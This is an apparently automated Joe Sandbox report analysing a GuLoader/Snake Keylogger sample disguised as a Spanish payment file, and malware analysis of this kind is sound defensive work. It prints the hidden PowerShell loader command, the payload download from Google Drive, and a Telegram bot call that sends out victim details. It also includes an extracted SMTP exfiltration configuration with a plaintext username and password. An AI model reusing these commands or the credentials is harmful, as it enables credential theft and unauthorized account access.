Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PAGO FRAS. AGOSTO 2024..exe

Overview

General Information

Sample name:PAGO FRAS. AGOSTO 2024..exe
Analysis ID:1538463
MD5:400ae56b0e2f429c20f563959042b2e9
SHA1:383b18e2e55a4f7bea251cc82aec9cdae9f22fed
SHA256:7e6de6e460ec2322a30dfeca3a723811d3ac15486fa2139a3454edbc7b1927df
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • PAGO FRAS. AGOSTO 2024..exe (PID: 7408 cmdline: "C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe" MD5: 400AE56B0E2F429C20F563959042B2E9)
    • powershell.exe (PID: 7432 cmdline: "powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 7808 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "comercial@inplasval.es", "Password": "Comercialplastico3.", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.4128839595.000000002019D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000001.00000002.1875277086.0000000009583000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: msiexec.exe PID: 7808JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: msiexec.exe PID: 7808JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

            System Summary

            barindex
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.185.206, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7808, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 62508
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7432, TargetFilename: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets\PAGO FRAS. AGOSTO 2024..exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)", CommandLine: "powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe", ParentImage: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe, ParentProcessId: 7408, ParentProcessName: PAGO FRAS. AGOSTO 2024..exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)", ProcessId: 7432, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-21T11:04:11.057764+020028033053Unknown Traffic192.168.2.462512188.114.97.3443TCP
            2024-10-21T11:04:13.894461+020028033053Unknown Traffic192.168.2.462516188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-21T11:04:09.084667+020028032742Potentially Bad Traffic192.168.2.462510158.101.44.24280TCP
            2024-10-21T11:04:10.365945+020028032742Potentially Bad Traffic192.168.2.462510158.101.44.24280TCP
            2024-10-21T11:04:11.756572+020028032742Potentially Bad Traffic192.168.2.462513158.101.44.24280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-21T11:04:03.422209+020028032702Potentially Bad Traffic192.168.2.462508142.250.185.206443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "comercial@inplasval.es", "Password": "Comercialplastico3.", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
            Source: PAGO FRAS. AGOSTO 2024..exeVirustotal: Detection: 20%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228387A8 CryptUnprotectData,4_2_228387A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_22838EF1 CryptUnprotectData,4_2_22838EF1
            Source: PAGO FRAS. AGOSTO 2024..exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62511 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:62508 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 216.58.206.33:443 -> 192.168.2.4:62509 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:62527 version: TLS 1.2
            Source: PAGO FRAS. AGOSTO 2024..exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: em.Core.pdbFp3 source: powershell.exe, 00000001.00000002.1874467014.0000000008AA0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bqm.Core.pdb source: powershell.exe, 00000001.00000002.1874467014.0000000008AA0000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeCode function: 0_2_00406033 FindFirstFileA,FindClose,0_2_00406033
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeCode function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055D1
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 001FF45Dh4_2_001FF2C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 001FF45Dh4_2_001FF4AC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 001FFC19h4_2_001FF961
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2283BA76h4_2_2283B7A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 22839280h4_2_22838FB0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 22837EB5h4_2_22837B78
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov esp, ebp4_2_2283B081
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 22836733h4_2_22836488
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 22830741h4_2_22830498
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 22832151h4_2_22831EA8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2283E386h4_2_2283E0B8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 22837571h4_2_228372C8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2283C396h4_2_2283C0C8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 22835179h4_2_22834ED0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 22830B99h4_2_228308F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2283F5C6h4_2_2283F2F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 228332B1h4_2_22833008
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 22836CC1h4_2_22836A18
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 228348C9h4_2_22834620
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2283DEF6h4_2_2283DC28
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 228362D9h4_2_22836030
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2283BF06h4_2_2283BC38
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 228302E9h4_2_22830040
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 22831CF9h4_2_22831A50
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 22833709h4_2_22833460
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2283F136h4_2_2283EE68
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 22837119h4_2_22836E70
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 22834D21h4_2_22834A78
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2283D146h4_2_2283CE78
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 22835A29h4_2_22835780
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2283FA56h4_2_2283F788
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2283DA66h4_2_2283D798
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 22831449h4_2_228311A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 22832E59h4_2_22832BB0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 22835E81h4_2_22835BD8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2283ECA6h4_2_2283E9D8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2283CCB6h4_2_2283C9E8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 228318A1h4_2_228315F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 228325A9h4_2_22832300
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2283D5D6h4_2_2283D308
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2283B5E6h4_2_2283B318
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 228379C9h4_2_22837720
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 228355D1h4_2_22835328
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 22830FF1h4_2_22830D48
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2283E816h4_2_2283E548
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 22832A01h4_2_22832758
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2283C826h4_2_2283C558

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:138727%0D%0ADate%20and%20Time:%2021/10/2024%20/%2019:07:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20138727%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:62510 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:62513 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:62516 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:62508 -> 142.250.185.206:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:62512 -> 188.114.97.3:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ItIBdLavxGfZi6rWeX-K_CF9nDPwNWT3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1ItIBdLavxGfZi6rWeX-K_CF9nDPwNWT3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:62511 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ItIBdLavxGfZi6rWeX-K_CF9nDPwNWT3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1ItIBdLavxGfZi6rWeX-K_CF9nDPwNWT3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:138727%0D%0ADate%20and%20Time:%2021/10/2024%20/%2019:07:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20138727%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 21 Oct 2024 09:04:22 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: msiexec.exe, 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: msiexec.exe, 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: msiexec.exe, 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: msiexec.exe, 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: powershell.exe, 00000001.00000002.1866731311.0000000007837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
            Source: PAGO FRAS. AGOSTO 2024..exe, PAGO FRAS. AGOSTO 2024..exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: PAGO FRAS. AGOSTO 2024..exe, PAGO FRAS. AGOSTO 2024..exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000001.00000002.1860973910.00000000060FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000001.00000002.1858126944.00000000051E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.1858126944.0000000005091000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: msiexec.exe, 00000004.00000002.4128839595.0000000020091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: powershell.exe, 00000001.00000002.1858126944.00000000051E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000001.00000002.1858126944.0000000005091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: msiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: msiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: msiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: msiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:138727%0D%0ADate%20a
            Source: msiexec.exe, 00000004.00000003.1925140710.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1923872826.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
